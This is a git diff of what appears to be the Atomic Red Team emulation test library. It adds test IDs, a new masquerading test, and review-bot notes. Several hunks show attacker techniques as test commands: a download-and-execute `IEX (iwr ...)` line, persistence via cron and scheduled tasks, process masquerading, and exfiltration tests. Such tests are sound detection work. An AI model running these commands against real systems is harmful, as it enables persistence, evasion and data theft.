+if (Test-Path #{inputfile}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -237,10 +261,14 @@ Copies a windows exe, renames it as another windows exe, and launches it to masq
**Supported Platforms:** Windows
+**auto_generated_guid:** c3d24a39-2bfe-4c6a-b064-90cd73896cb0
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| outputfile | path of file to execute | path | ($env:TEMP + "\svchost.exe")|
| inputfile | path of file to copy | path | $env:ComSpec|
@@ -276,6 +304,10 @@ Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from
**Supported Platforms:** Windows
+**auto_generated_guid:** 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f
+
+
+
@@ -308,10 +340,14 @@ e.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc
**Supported Platforms:** Windows
+**auto_generated_guid:** c7fa0c3b-b57f-4cba-9118-863bf4e653fc
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| exe_path | path to exe to use when creating masquerading files | path | C:\Windows\System32\calc.exe|
| vbs_path | path of vbs to use when creating masquerading files | path | PathToAtomicsFolder\T1036.003\src\T1036.003_masquerading.vbs|
diff --git a/atomics/T1036.004/T1036.004.md b/atomics/T1036.004/T1036.004.md
index e6448421..cc23c8db 100644
--- a/atomics/T1036.004/T1036.004.md
+++ b/atomics/T1036.004/T1036.004.md
@@ -19,6 +19,10 @@ Creating W32Time similar named service (win32times) using schtasks just like thr
**Supported Platforms:** Windows
+**auto_generated_guid:** f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9
+
+
+
@@ -48,6 +52,10 @@ Creating W32Time similar named service (win32times) using sc just like threat ac
**Supported Platforms:** Windows
+**auto_generated_guid:** b721c6ef-472c-4263-a0d9-37f1f4ecff66
+
+
+
diff --git a/atomics/T1036.005/T1036.005.md b/atomics/T1036.005/T1036.005.md
new file mode 100644
index 00000000..906ddca2
--- /dev/null
+++ b/atomics/T1036.005/T1036.005.md
@@ -0,0 +1,51 @@
+# T1036.005 - Match Legitimate Name or Location
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/005)
+Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
+
+Adversaries may also use the same icon of the file they are trying to mimic.
+
+## Atomic Tests
+
+- [Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.](#atomic-test-1---execute-a-process-from-a-directory-masquerading-as-the-current-parent-directory)
+
+
+
+
+## Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.
+Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
+
+**Supported Platforms:** macOS, Linux
+
+
+**auto_generated_guid:** 812c3ab8-94b0-4698-a9bf-9420af23ce24
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| test_message | Test message to echo out to the screen | String | Hello from the Atomic Red Team test T1036.005#1|
+
+
+#### Attack Commands: Run with `sh`!
+
+
+```sh
+mkdir $HOME/...
+cp $(which sh) $HOME/...
+$HOME/.../sh -c "echo #{test_message}"
+```
+
+#### Cleanup Commands:
+```sh
+rm -f $HOME/.../sh
+rmdir $HOME/.../
+```
+
+
+
+
+
+
diff --git a/atomics/T1036.005/T1036.005.yaml b/atomics/T1036.005/T1036.005.yaml
new file mode 100644
index 00000000..2dc6b7b9
--- /dev/null
+++ b/atomics/T1036.005/T1036.005.yaml
@@ -0,0 +1,30 @@
+---
+attack_technique: T1036.005
+display_name: 'Masquerading: Match Legitimate Name or Location'
+
+atomic_tests:
+- name: Execute a process from a directory masquerading as the current parent directory.
+ auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24
+ description: |
+ Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
+
+ supported_platforms:
+ - macos
+ - linux
+
+ input_arguments:
+ test_message:
+ description: Test message to echo out to the screen
+ type: String
+ default: Hello from the Atomic Red Team test T1036.005#1
+
+ executor:
+ name: sh
+ elevation_required: false
+ command: |
+ mkdir $HOME/...
+ cp $(which sh) $HOME/...
+ $HOME/.../sh -c "echo #{test_message}"
+ cleanup_command: |
+ rm -f $HOME/.../sh
+ rmdir $HOME/.../
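Review bot: The value of `test_message` is spliced into a double-quoted sh string at `$HOME/.../sh -c "echo #{test_message}"`, so a message containing `"`, a backtick or `$` breaks the command or is expanded by the shell instead of being echoed; single-quoting the argument, `$HOME/.../sh -c 'echo #{test_message}'`, keeps everything except a literal `'` inert. The `$HOME` expansions in the command and cleanup are unquoted as well, which breaks for a home path containing whitespace; `"$HOME/..."` is the safer form. Because `mkdir $HOME/...` has no `-p`, a directory left behind by a run whose cleanup failed makes the first line error, though the copy and execution still proceed; `mkdir -p "$HOME/..."` makes re-runs quiet. The generated T1036.005.md hunk above mirrors the same command text.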
diff --git a/atomics/T1036.006/T1036.006.md b/atomics/T1036.006/T1036.006.md
index e8191189..6a9c6ddc 100644
--- a/atomics/T1036.006/T1036.006.md
+++ b/atomics/T1036.006/T1036.006.md
@@ -19,6 +19,10 @@ Space After Filename
**Supported Platforms:** macOS
+**auto_generated_guid:** 89a7dd26-e510-4c9f-9b15-f3bae333360f
+
+
+
#### Run it with these steps!
diff --git a/atomics/T1036/T1036.md b/atomics/T1036/T1036.md
index b426a16f..7c5ef536 100644
--- a/atomics/T1036/T1036.md
+++ b/atomics/T1036/T1036.md
@@ -17,6 +17,10 @@ It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a n
**Supported Platforms:** Windows
+**auto_generated_guid:** 51005ac7-52e2-45e0-bdab-d17c6d4916cd
+
+
+
diff --git a/atomics/T1037.001/T1037.001.md b/atomics/T1037.001/T1037.001.md
index c1163486..40211c19 100644
--- a/atomics/T1037.001/T1037.001.md
+++ b/atomics/T1037.001/T1037.001.md
@@ -18,10 +18,14 @@ that can be viewed in the Registry Editor.
**Supported Platforms:** Windows
+**auto_generated_guid:** d6042746-07d4-4c92-9ad8-e644c114a231
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script_path | Path to .bat file | String | %temp%\art.bat|
| script_command | Command To Execute | String | echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037.001-log.txt|
diff --git a/atomics/T1037.002/T1037.002.md b/atomics/T1037.002/T1037.002.md
index b5745668..145b05de 100644
--- a/atomics/T1037.002/T1037.002.md
+++ b/atomics/T1037.002/T1037.002.md
@@ -17,6 +17,10 @@ Mac logon script
**Supported Platforms:** macOS
+**auto_generated_guid:** f047c7de-a2d9-406e-a62b-12a09d9516f4
+
+
+
#### Run it with these steps!
diff --git a/atomics/T1037.004/T1037.004.md b/atomics/T1037.004/T1037.004.md
index 5e258a38..d7876f5e 100644
--- a/atomics/T1037.004/T1037.004.md
+++ b/atomics/T1037.004/T1037.004.md
@@ -27,6 +27,10 @@ Modify rc.common
**Supported Platforms:** macOS
+**auto_generated_guid:** 97a48daa-8bca-4bc0-b1a9-c1d163e762de
+
+
+
@@ -51,6 +55,10 @@ Modify rc.common
**Supported Platforms:** Linux
+**auto_generated_guid:** c33f3d80-5f04-419b-a13a-854d1cbdbf3a
+
+
+
@@ -83,6 +91,10 @@ Modify rc.local
**Supported Platforms:** Linux
+**auto_generated_guid:** 126f71af-e1c9-405c-94ef-26a47b16c102
+
+
+
diff --git a/atomics/T1037.005/T1037.005.md b/atomics/T1037.005/T1037.005.md
index 808ac4eb..278fe1fc 100644
--- a/atomics/T1037.005/T1037.005.md
+++ b/atomics/T1037.005/T1037.005.md
@@ -21,6 +21,10 @@ Modify or create an file in /Library/StartupItems
**Supported Platforms:** macOS
+**auto_generated_guid:** 134627c3-75db-410e-bff8-7a920075f198
+
+
+
diff --git a/atomics/T1040/T1040.md b/atomics/T1040/T1040.md
index b1a21362..e2076782 100644
--- a/atomics/T1040/T1040.md
+++ b/atomics/T1040/T1040.md
@@ -27,10 +27,14 @@ Upon successful execution, tshark or tcpdump will execute and capture 5 packets
**Supported Platforms:** Linux
+**auto_generated_guid:** 7fe741f7-b265-4951-a7c7-320889083b3e
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | ens33|
@@ -50,7 +54,7 @@ tshark -c 5 -i #{interface}
##### Description: Check if at least one of the tools are installed on the machine.
##### Check Prereq Commands:
```bash
-if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
+if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
```
##### Get Prereq Commands:
```bash
@@ -71,10 +75,14 @@ Upon successful execution, tshark or tcpdump will execute and capture 5 packets
**Supported Platforms:** macOS
+**auto_generated_guid:** 9d04efee-eff5-4240-b8d2-07792b873608
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | en0A|
@@ -94,7 +102,7 @@ if [ -x "$(command -v tshark)" ]; then sudo tshark -c 5 -i #{interface}; fi;
##### Description: Check if at least one of the tools are installed on the machine.
##### Check Prereq Commands:
```bash
-if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
+if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
```
##### Get Prereq Commands:
```bash
@@ -116,10 +124,14 @@ Upon successful execution, tshark will execute and capture 5 packets on interfac
**Supported Platforms:** Windows
+**auto_generated_guid:** a5b2f6a0-24b4-493e-9590-c699f75723ca
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | Ethernet|
| wireshark_url | wireshark installer download URL | url | https://1.eu.dl.wireshark.org/win64/Wireshark-win64-3.4.5.exe|
@@ -142,7 +154,7 @@ Upon successful execution, tshark will execute and capture 5 packets on interfac
##### Description: tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe".
##### Check Prereq Commands:
```powershell
-if (test-path "#{tshark_path}") {exit 0} else {exit 1}
+if (test-path "#{tshark_path}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -152,7 +164,7 @@ Start-Process $env:temp\wireshark_installer.exe /S
##### Description: npcap must be installed.
##### Check Prereq Commands:
```powershell
-if (test-path "#{npcap_path}") {exit 0} else {exit 1}
+if (test-path "#{npcap_path}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -173,6 +185,10 @@ After execution you should find a file named trace.etl and trace.cab in the temp
**Supported Platforms:** Windows
+**auto_generated_guid:** b5656f67-d67f-4de8-8e62-b5581630f528
+
+
+
diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md
index 6da6944c..c97b6af1 100644
--- a/atomics/T1046/T1046.md
+++ b/atomics/T1046/T1046.md
@@ -25,6 +25,10 @@ Upon successful execution, sh will perform a network connection against a single
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 68e907da-2539-48f6-9fc9-257a78c05540
+
+
+
@@ -54,10 +58,14 @@ Upon successful execution, sh will utilize nmap, telnet, and nc to contact a sin
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 515942b0-a09f-4163-a7bb-22fefb6f185f
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| host | Host to scan. | string | 192.168.1.1|
| port | Ports to scan. | string | 80|
@@ -80,7 +88,7 @@ nc -nv #{host} #{port}
##### Description: Check if nmap command exists on the machine
##### Check Prereq Commands:
```sh
-if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
+if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
@@ -99,10 +107,14 @@ Scan ports to check for listening ports for the local host 127.0.0.1
**Supported Platforms:** Windows
+**auto_generated_guid:** d696a3cb-d7a8-4976-8eb5-5af4abf2e3df
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| nmap_url | NMap installer download URL | url | https://nmap.org/dist/nmap-7.80-setup.exe|
| host_to_scan | The host to scan with NMap | string | 127.0.0.1|
@@ -122,7 +134,7 @@ nmap #{host_to_scan}
##### Description: NMap must be installed
##### Check Prereq Commands:
```powershell
-if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}
+if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -142,10 +154,14 @@ Scan ports to check for listening ports with python
**Supported Platforms:** Windows
+**auto_generated_guid:** 6ca45b04-9f15-4424-b9d3-84a217285a5c
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| host_ip | Host to scan. | string | 127.0.0.1|
| filename | Location of the project file | Path | PathToAtomicsFolder\T1046\src\T1046.py|
@@ -165,7 +181,7 @@ python #(unknown) -i #{host_ip}
##### Description: Check if python exists on the machine
##### Check Prereq Commands:
```powershell
-if (python --version) {exit 0} else {exit 1}
+if (python --version) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1047/T1047.md b/atomics/T1047/T1047.md
index ca7319d7..7b2812cb 100644
--- a/atomics/T1047/T1047.md
+++ b/atomics/T1047/T1047.md
@@ -32,6 +32,10 @@ When the test completes , there should be local user accounts information displa
**Supported Platforms:** Windows
+**auto_generated_guid:** c107778c-dcf5-47c5-af2e-1d058a3df3ea
+
+
+
@@ -57,6 +61,10 @@ When the test completes , there should be running processes listed on the comman
**Supported Platforms:** Windows
+**auto_generated_guid:** 5750aa16-0e59-4410-8b9a-8a47ca2788e2
+
+
+
@@ -82,6 +90,10 @@ When the test completes, there should be a list of installed patches and when th
**Supported Platforms:** Windows
+**auto_generated_guid:** 718aebaa-d0e0-471a-8241-c5afa69c7414
+
+
+
@@ -110,10 +122,14 @@ if the provided remote host is unreacheable
**Supported Platforms:** Windows
+**auto_generated_guid:** 0fd48ef7-d890-4e93-a533-f7dedd5191d3
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| node | Ip Address | String | 127.0.0.1|
| service_search_string | Name Of Service | String | Spooler|
@@ -141,10 +157,14 @@ When the test completes , a new process will be started locally .A notepad appli
**Supported Platforms:** Windows
+**auto_generated_guid:** b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process_to_execute | Name or path of process to execute. | String | notepad.exe|
@@ -176,10 +196,14 @@ A common error message is "Node - (provided IP or default) ERROR Description =T
**Supported Platforms:** Windows
+**auto_generated_guid:** 9c8ef159-c666-472f-9874-90c8d60d136b
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| node | Ip Address | String | 127.0.0.1|
| user_name | Username | String | DOMAIN\Administrator|
@@ -218,6 +242,10 @@ You should expect to see notepad.exe running after execution of this test.
**Supported Platforms:** Windows
+**auto_generated_guid:** 7db7a7f9-9531-4840-9b30-46220135441c
+
+
+
@@ -243,10 +271,14 @@ This test tries to mask process creation by creating a new class that inherits f
**Supported Platforms:** Windows
+**auto_generated_guid:** 10447c83-fc38-462a-a936-5102363b1c43
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| new_class | Derived class name | String | Win32_Atomic|
| process_to_execute | Name or path of process to execute. | String | notepad.exe|
diff --git a/atomics/T1048.003/T1048.003.md b/atomics/T1048.003/T1048.003.md
index 7a658ca8..db4db939 100644
--- a/atomics/T1048.003/T1048.003.md
+++ b/atomics/T1048.003/T1048.003.md
@@ -27,6 +27,10 @@ Upon successful execution, sh will be used to make a directory (/tmp/victim-stag
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff
+
+
+
#### Run it with these steps!
@@ -61,10 +65,14 @@ Upon successful execution, powershell will utilize ping (icmp) to exfiltrate not
**Supported Platforms:** Windows
+**auto_generated_guid:** dd4b4421-2e25-4593-90ae-7021947ad12e
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path to file to be exfiltrated. | Path | C:\Windows\System32\notepad.exe|
| ip_address | Destination IP address where the data should be sent. | String | 127.0.0.1|
@@ -91,6 +99,10 @@ Exfiltration of specified file over DNS protocol.
**Supported Platforms:** Linux
+**auto_generated_guid:** c403b5a4-b5fc-49f2-b181-d1c80d27db45
+
+
+
#### Run it with these steps!
@@ -122,10 +134,14 @@ Upon successful execution, powershell will invoke web request using POST method
**Supported Platforms:** Windows
+**auto_generated_guid:** 6aa58451-1121-4490-a8e9-1dada3f1c68c
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path to file to exfiltrate | Path | C:\Windows\System32\notepad.exe|
| ip_address | Destination IP address where the data should be sent | String | http://127.0.0.1|
@@ -154,10 +170,14 @@ Upon successful execution, powershell will send an email with attached file to e
**Supported Platforms:** Windows
+**auto_generated_guid:** ec3a835e-adca-4c7c-88d2-853b69c11bb9
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path to file to exfiltrate | Path | C:\Windows\System32\notepad.exe|
| sender | The email address of the sender | String | test@corp.com|
diff --git a/atomics/T1048/T1048.md b/atomics/T1048/T1048.md
index 6e6ecf17..53137544 100644
--- a/atomics/T1048/T1048.md
+++ b/atomics/T1048/T1048.md
@@ -25,10 +25,14 @@ Upon successful execution, sh will spawn ssh contacting a remote domain (default
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** f6786cc8-beda-4915-a4d6-ac2f193bb988
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | target SSH domain | url | target.example.com|
@@ -58,10 +62,14 @@ Upon successful execution, tar will compress /Users/* directory and password pro
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 7c3cb337-35ae-4d06-bf03-3032ed2ec268
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username for domain | string | atomic|
| password | password for user | string | atomic|
diff --git a/atomics/T1049/T1049.md b/atomics/T1049/T1049.md
index 414e5e25..edc081e0 100644
--- a/atomics/T1049/T1049.md
+++ b/atomics/T1049/T1049.md
@@ -27,6 +27,10 @@ Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net se
**Supported Platforms:** Windows
+**auto_generated_guid:** 0940a971-809a-48f1-9c4d-b1d785e96ee5
+
+
+
@@ -55,6 +59,10 @@ Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. R
**Supported Platforms:** Windows
+**auto_generated_guid:** f069f0f1-baad-4831-aa2b-eddac4baac4a
+
+
+
@@ -81,6 +89,10 @@ Upon successful execution, sh will execute `netstat` and `who -a`. Results will
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
+
+
+
@@ -99,7 +111,7 @@ who -a
##### Description: Check if netstat command exists on the machine
##### Check Prereq Commands:
```sh
-if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi;
+if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
@@ -120,10 +132,14 @@ Upon successful execution, cmd.exe will execute sharpview.exe . Results
**Supported Platforms:** Windows
+**auto_generated_guid:** 96f974bb-a0da-4d87-a744-ff33e73367e9
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| SharpView_url | sharpview download URL | url | https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true|
| SharpView | Path of the executable opensource redteam tool used for the performing this atomic. | path | PathToAtomicsFolder\T1049\bin\SharpView.exe|
@@ -146,7 +162,7 @@ foreach ($syntax in $syntaxList) {
##### Description: Sharpview.exe must exist on disk at specified location (#{SharpView})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{SharpView}) {exit 0} else {exit 1}
+if (Test-Path #{SharpView}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1053.001/T1053.001.md b/atomics/T1053.001/T1053.001.md
index 03205105..64bdb473 100644
--- a/atomics/T1053.001/T1053.001.md
+++ b/atomics/T1053.001/T1053.001.md
@@ -17,10 +17,14 @@ This test submits a command to be run in the future by the `at` daemon.
**Supported Platforms:** Linux
+**auto_generated_guid:** 7266d898-ac82-4ec0-97c7-436075d0d08e
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| time_spec | Time specification of when the command should run | String | now + 1 minute|
| at_command | The command to be run | String | echo Hello from Atomic Red Team|
@@ -40,7 +44,7 @@ echo "#{at_command}" | at #{time_spec}
##### Description: The `at` and `atd` executables must exist in the PATH
##### Check Prereq Commands:
```sh
-which at && which atd
+which at && which atd
```
##### Get Prereq Commands:
```sh
@@ -49,7 +53,7 @@ echo 'Please install `at` and `atd`; they were not found in the PATH (Package na
##### Description: The `atd` daemon must be running
##### Check Prereq Commands:
```sh
-systemctl status atd || service atd status
+systemctl status atd || service atd status
```
##### Get Prereq Commands:
```sh
diff --git a/atomics/T1053.002/T1053.002.md b/atomics/T1053.002/T1053.002.md
index 63774d6d..615c84dd 100644
--- a/atomics/T1053.002/T1053.002.md
+++ b/atomics/T1053.002/T1053.002.md
@@ -22,6 +22,10 @@ Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task
**Supported Platforms:** Windows
+**auto_generated_guid:** 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8
+
+
+
diff --git a/atomics/T1053.003/T1053.003.md b/atomics/T1053.003/T1053.003.md
index 7cda336c..dd2cfbef 100644
--- a/atomics/T1053.003/T1053.003.md
+++ b/atomics/T1053.003/T1053.003.md
@@ -21,10 +21,14 @@ This test replaces the current user's crontab file with the contents of the refe
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 435057fb-74b1-410e-9403-d81baf194f75
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command | Command to execute | string | /tmp/evil.sh|
| tmp_cron | Temporary reference file to hold evil cron schedule | path | /tmp/persistevil|
@@ -56,10 +60,14 @@ This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log|
| cron_script_name | Name of file to store in cron folder | string | persistevil|
@@ -96,10 +104,14 @@ This test adds a script to a /var/spool/cron/crontabs folder configured to execu
**Supported Platforms:** Linux
+**auto_generated_guid:** 2d943c18-e74a-44bf-936f-25ade6cccab4
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log|
| cron_script_name | Name of file to store in /var/spool/cron/crontabs folder | string | persistevil|
diff --git a/atomics/T1053.004/T1053.004.md b/atomics/T1053.004/T1053.004.md
index 14817e59..3692545d 100644
--- a/atomics/T1053.004/T1053.004.md
+++ b/atomics/T1053.004/T1053.004.md
@@ -17,10 +17,14 @@ This test adds persistence via a plist to execute via the macOS Event Monitor Da
**Supported Platforms:** macOS
+**auto_generated_guid:** 11979f23-9b9d-482a-9935-6fc9cd022c3e
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script_location | evil plist location | path | $PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist|
| script_destination | Path where to move the evil plist | path | /etc/emond.d/rules/atomicredteam_T1053_004.plist|
diff --git a/atomics/T1053.005/T1053.005.md b/atomics/T1053.005/T1053.005.md
index 82634bed..a2a34da5 100644
--- a/atomics/T1053.005/T1053.005.md
+++ b/atomics/T1053.005/T1053.005.md
@@ -30,6 +30,10 @@ the tasks, open the Task Scheduler and look in the Active Tasks pane.
**Supported Platforms:** Windows
+**auto_generated_guid:** fec27f65-db86-4c2d-b66c-61945aee87c2
+
+
+
@@ -60,10 +64,14 @@ Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe
**Supported Platforms:** Windows
+**auto_generated_guid:** 42f53695-ad4a-4546-abb6-7d837f644a71
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| task_command | What you want to execute | String | C:\windows\system32\cmd.exe|
| time | What time 24 Hour | String | 72600|
@@ -96,10 +104,14 @@ Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe
**Supported Platforms:** Windows
+**auto_generated_guid:** 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| task_command | What you want to execute | String | C:\windows\system32\cmd.exe|
| time | What time 24 Hour | String | 72600|
@@ -135,6 +147,10 @@ Upon successful execution, powershell.exe will create a scheduled task to spawn
**Supported Platforms:** Windows
+**auto_generated_guid:** af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
+
+
+
@@ -169,10 +185,14 @@ This module utilizes the Windows API to schedule a task for code execution (note
**Supported Platforms:** Windows
+**auto_generated_guid:** ecd3fa21-7792-41a2-8726-2c5c673414d3
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ms_product | Maldoc application Word | String | Word|
@@ -181,7 +201,8 @@ This module utilizes the Windows API to schedule a task for code execution (note
```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
```
@@ -197,7 +218,7 @@ try {
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
-} catch { exit 1 }
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -216,6 +237,10 @@ Create an scheduled task that executes notepad.exe after user login from XML by
**Supported Platforms:** Windows
+**auto_generated_guid:** e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b
+
+
+
diff --git a/atomics/T1053.005/T1053.005.yaml b/atomics/T1053.005/T1053.005.yaml
index a7a51aef..59a7b460 100644
--- a/atomics/T1053.005/T1053.005.yaml
+++ b/atomics/T1053.005/T1053.005.yaml
@@ -127,7 +127,8 @@ atomic_tests:
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
executor:
command: |
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
name: powershell
- name: WMI Invoke-CimMethod Scheduled Task
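Review bot: The new `IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)` still downloads and executes whatever the `master` branch serves at run time, with no pinned commit or hash, so the test's behavior depends on the live state of that branch and on network access. The URL path lies inside this repository's own `atomics` tree, so if a full checkout is present the script could be dot-sourced locally, e.g. `. "PathToAtomicsFolder\T1204.002\src\Invoke-MalDoc.ps1"`, which also removes the need for the TLS line; pinning the URL to a commit SHA is the fallback if a remote fetch is intended. Note too that `[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12` assigns rather than ORs into the existing value, so any other protocol the process had enabled is dropped for the rest of the session. The same two lines appear in the generated T1053.005.md hunk above and in the 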